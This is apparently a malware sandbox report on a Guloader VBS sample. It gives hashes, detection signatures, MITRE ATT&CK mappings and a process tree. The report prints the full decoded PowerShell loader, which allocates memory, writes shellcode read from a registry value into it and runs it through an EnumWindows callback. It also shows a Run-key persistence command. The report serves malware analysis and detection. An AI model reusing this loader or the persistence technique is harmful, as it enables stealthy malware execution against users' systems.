Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2024 20:33
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs
-
Size
344KB
-
MD5
26c1961c629a942788089f89b1cac50c
-
SHA1
935559fe62e2178e4efc45a31ab1d11488d8412c
-
SHA256
7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9
-
SHA512
5ca13c271e755ff13a6926a20773af65c4aa755a92f4a4e3891558675acd0738b2fcdf1873bd1545a21ebcae771275ec35ff36c866b0cd9be8970a7f11a415ce
-
SSDEEP
1536:N64IoY2vqki1BN/cjGRhMR+ebjz9IjRmvog6nCaysWYp2IazMRAt6DziIwNFczqt:KoRyk1SXCXz99vog6jysuMRkmiIY+y
Malware Config
Signatures
-
Guloader family
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WScript.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Perchl67 = "%Ostun% -w 1 $Indl=(Get-ItemProperty -Path 'HKCU:\\SOFTWARE\\AppDataLow\\').Labbeuvu;%Ostun% -encodedcommand($Indl)" ieinstal.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 588 powershell.exe 4576 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 588 set thread context of 4576 588 powershell.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ieinstal.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 588 powershell.exe 588 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 588 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 4448 wrote to memory of 588 4448 WScript.exe 82 PID 4448 wrote to memory of 588 4448 WScript.exe 82 PID 4448 wrote to memory of 588 4448 WScript.exe 82 PID 588 wrote to memory of 4700 588 powershell.exe 84 PID 588 wrote to memory of 4700 588 powershell.exe 84 PID 588 wrote to memory of 4700 588 powershell.exe 84 PID 4700 wrote to memory of 1644 4700 csc.exe 85 PID 4700 wrote to memory of 1644 4700 csc.exe 85 PID 4700 wrote to memory of 1644 4700 csc.exe 85 PID 588 wrote to memory of 4576 588 powershell.exe 90 PID 588 wrote to memory of 4576 588 powershell.exe 90 PID 588 wrote to memory of 4576 588 powershell.exe 90 PID 588 wrote to memory of 4576 588 powershell.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7d920532b4b748249e809c93368dc5c317479dfa2855df5dc8f559c6936205f9.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# I n d i   T e t r a   P e r r a d   N d v e   A t t r u p s   E f t e r g i   B e g y n   P u r l i   B a s i   L a v v   H e a d l i   I s b n   a f a r t e r n e   T i l b a g e d a t   H i g h l y r   U n l o v e l i e   G d s k   U d s i g   S p i n c o v a   S a n k e k o   F u n d   d e n o t a t i   S i n s o p s g   Z y g o s   E m p y r e u   T o a s t e d   N o n e n   X e r o g r a p h   L a t i g    
 # P a r t r i   M u t a r o t a t   T r a l l   S e m i h i s t   Z y g o m y c e   T i g e r e n   C e n t r   S t u t   V a g t p o   C h a r m e   K y n d e l m i s   B e t r   l a s s i   P h i l i   l o v o v e r t r   M o u i l l e b r   T u b a t e b i   A f v n n e d e   T w i l i   A l c a i   L t n i n g p u l   M u c i n    
 # S l b e r n e   b i l l e d   T e l e v   V e r d e n s   C o n s e c r   A r b e j d s f o   F e r i e u g e u d   F l a m b   B r i l l e   A d z e r   T h e o r e t i   E n c h a s e   s l a n g   B o r t f    
 $ M a s t e r M i n d   =   [ c h a r ] 3 4   +   " N "   +   " t A l "   +   " l o c "   +   " a t e " + " V i "   +   " r t u a l "   +   " M e m o r y "   +   [ c h a r ] 3 4  
  
 # F i n t m a s k   R o k k e d e   C o n s i   S u b d e f i   N e p o t i s t   P u p i l   F e s t l i g h o l   F o r s t y r   P r o d u k t a n s   N e p h r a d e   R i b b o n f   I n v i o l a t e d   P u d e n t t e   M e l a n c h o   P r o e p i m e r o   S k i f t   M e r k a n t i l i   B e g y n d e l s e   C e r u l e   S o m a   K e g l e r s f r e   T a n d g l a s   O u t p a c e s c r   A a b n i n g   V a n g l    
 # D y s t o m o u s y   E i r e   C a p l i n c   S m r r   S c h a c h t s c   C o l o s t r u   N s e v r d i g e n   S e m i h i   N i t r   M o i r e s m a a p   A t e l i e r   S k o k k   P a r t i c   N o n a c   R a m i   D u c h e s s e    
 # F i n g e r s p i d   A v l s h i n   I n c i v   P r e d e   S t a t i o   r e v i n d   K a i l y a r d e r   E l e a z a r b   P r o p i t   B a s h j   H u l s k e e    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   U n e u p h o 1  
 {  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   S l e e p E x ( i n t   B r a d y s p 0 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   G e t W i n d o w D C ( ) ;  
  
 [ D l l I m p o r t ( " n t d l l " ,   E n t r y P o i n t = $ M a s t e r M i n d ) ] p u b l i c   s t a t i c   e x t e r n   i n t   V i t r o S o l i d ( i n t   U n e u p h o 6 , r e f   I n t 3 2   B i l l e r 2 1 4 , i n t   S t r a n d f , r e f   I n t 3 2   U n e u p h o , i n t   O v e r p a i n t r , i n t   U n e u p h o 7 ) ;  
 [ D l l I m p o r t ( " D 2 s t a m p " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   P o o l S t a c k ( ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 " ,   E n t r y P o i n t = " E n u m W i n d o w s " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   M o r q q ( u i n t   S t r a n d f 5 , i n t   S t r a n d f 6 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S t r a n d f 1 , r e f   I n t 3 2   S t r a n d f 2 , i n t   S t r a n d f 3 ) ;  
  
 }  
 " @  
 # S e m a n t i   P r e s l i c   R a n u l a s t o   S o i r e e   U n d d r a g e   F u s s p   P l e i   S t e r n   S c o t c h w   S a c c h a r o c   F o d f s   S p a n i e l w   D e m o   H y p o f   S i a l o a n   S t o r m f a l d   F r g e   I n d e k l i m   T j e n   C h a r m   E s p i e r n   S p a t i n g s   T i g h   p o l y i m i d e p   K u e l s e p r   E r i n d   S w e l l   T i l e      
 $ U n e u p h o 3 = 0 ;  
 # R e e m i g r   T a y r   E v a n g e l i   M e c k e l i a n   t e m p e l   D i s a r r a y s   S t r a a l i n g   B a r o s m a p   E m e r g e r s   P o s e t b a s   P r e t r i   A a l a n d s k m a   O v e r t a l    
 $ U n e u p h o 9 = 1 0 4 8 5 7 6 ;  
 # N o r d m n d   F i l k a l d   S e t t e r   P r o p o s i t i   R e n s k   P r e p   M a n d a l a y   A n k r i n g s a f   S a l t i g r a   S j i p p e s o   h o r n i e r   H y g r o   D i n e r s   T r n e n   T r e m a n   G a m l i n g b n    
 $ U n e u p h o 8 = [ U n e u p h o 1 ] : : V i t r o S o l i d ( - 1 , [ r e f ] $ U n e u p h o 3 , 0 , [ r e f ] $ U n e u p h o 9 , 1 2 2 8 8 , 6 4 )  
 # U n e n v i r o   I n d l e v e r e   E f t e   O p a c o u s n   E v e n   C h a r g e r e   S a t s   R e f l   P a m o r t h o p e   u b e k v e m m   D i c t a m   T e l e g r   H i p b e r    
 $ B e g r = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ D e f o s s " ) . S a n c y p e s t i  
 # B u n d r e k o   R e k t i f   U n c o m p a t i   H a e v d o v e   O e u v r   P h o t o   S a l t c h u c k e   B o r g h e r r e n   S i k r i n g s s   D u n c h f l i s   A n i m i z e d   L i n i n g t r i   B h a v a n a d   F a v o r i   A p o t y p i c p   S v a l i n   K v a n   C y p r i   F l l e d e   I m p e   S t u d i e k o   D o s m e r e n p a   T a l l   L e v n e d   U n d e r h a a n d   S t e l l e n d e   C l u m s i n   R e h a b   C o l l   S y s t e m f   I d e a i s t i c   I m p u t a b l   G r a v i t a t    
 $ B e d r   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ B e g r . L e n g t h   /   2 )  
 # T a l e p d a g o   R u s k r e g n e n   O v e r l e w   S k i f   I n i q u i t i e   r o a d w   u d s l u   B e t r k   T o r n e s t r   L u m b a r s   P a r o n   T o r v e h a n d e   U d m a t r i   S i d a l c   M e r c e    
 F o r ( $ i = 0 ;   $ i   - l t   $ B e g r . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ B e d r [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ B e g r . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ S t e r e o 1 2 5 = 0 ;   $ S t e r e o 1 2 5   - l t   $ B e d r . c o u n t   ;   $ S t e r e o 1 2 5 + + )  
 {  
 	  
 [ U n e u p h o 1 ] : : R t l M o v e M e m o r y ( $ U n e u p h o 3 + $ S t e r e o 1 2 5 , [ r e f ] $ B e d r [ $ S t e r e o 1 2 5 ] , 1 )  
  
 }  
 [ U n e u p h o 1 ] : : M o r q q ( $ U n e u p h o 3 ,   0 )  
  
  
 "2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5o304gkt\5o304gkt.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D3C.tmp" "c:\Users\Admin\AppData\Local\Temp\5o304gkt\CSC28649895DE004713BFF08E77C3FA91F8.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4576
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5313ff667afc0a82ec7baad4e1980530f
SHA1b4ee1d3a3d774157d4930be006e4b37a8e897715
SHA256ea2775435eb86e7ee313369d214ba2bcd7699ff44dc207e2938b76562f2cd5e3
SHA5121c1d0ed69a5c31ae28b707dab271cdfa287efb5e2d50bb1845acc0b8d58feb557de27090ad662006448ec17c8a42a6f8153397958f7e549090c91201e8dceb49
-
Filesize
1KB
MD5aee0be896077067f6cbfed0f524b1c67
SHA1b4a5dea040b8b7e440200c31965c26d3ffa4594d
SHA256da306cc8b92635ddbf88e5644f9251dda48939d4fc8c7acffa71e8fb931a2b70
SHA512b100747fa7398b5662a8c3991292fef83b8cc9c0f768e645aa10d94a68077d54a815c861fa04760d201fda9d4ac648a74648c429845262ed1c0ca538bae95b2e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
706B
MD52f2d59ad9746f83211ab41b81f4ffb53
SHA13266d96213f29e9d3b556b124df0f617e30e6037
SHA256841ca0fdae8cb9d8d1c70b96dd57ba4fd2c6df399be995b63028a9e9b218d1b9
SHA512e5baea9a9115a2cd410894f140099b5c6a2acf494c1f5b6ee773ea2513b067039f4f7dffdb83ca60e7793fbb2be23b29fab1c4a5ca72844d75a77b02696ccde2
-
Filesize
369B
MD583c600fd19c4a05e14b8dc79a7813ee1
SHA13ccdd369984fe521d431db9a81964b06d57faa40
SHA2562ca0f0d1e389426b2031bd293166fa6a6071fcf538a3d1ea68f789a669a981d1
SHA512bcdd33c95fda74592de65d18e295fe705b0dbca87cf4f798251fe936af5087c58fa699acd1f14cb1227bd016f4c43feede7de0760a18de64050623c6142790cc
-
Filesize
652B
MD5a4964f3a1613629a5ae59e39420d0fa6
SHA11d6f627764037377ae1c50456b08612ac59ca7c6
SHA256b0d6876f6de1840511a562a72065c21f50cf1d4bffae92755d8f0b0d0eac229a
SHA512cb785f5fc1ebf2e52eecbd6d0036489e241527d07bf26317b3e180b245b3d1e99903e629fd69ba064d23fc8f6c410df716a702e595430adc09e95700bc0a9a39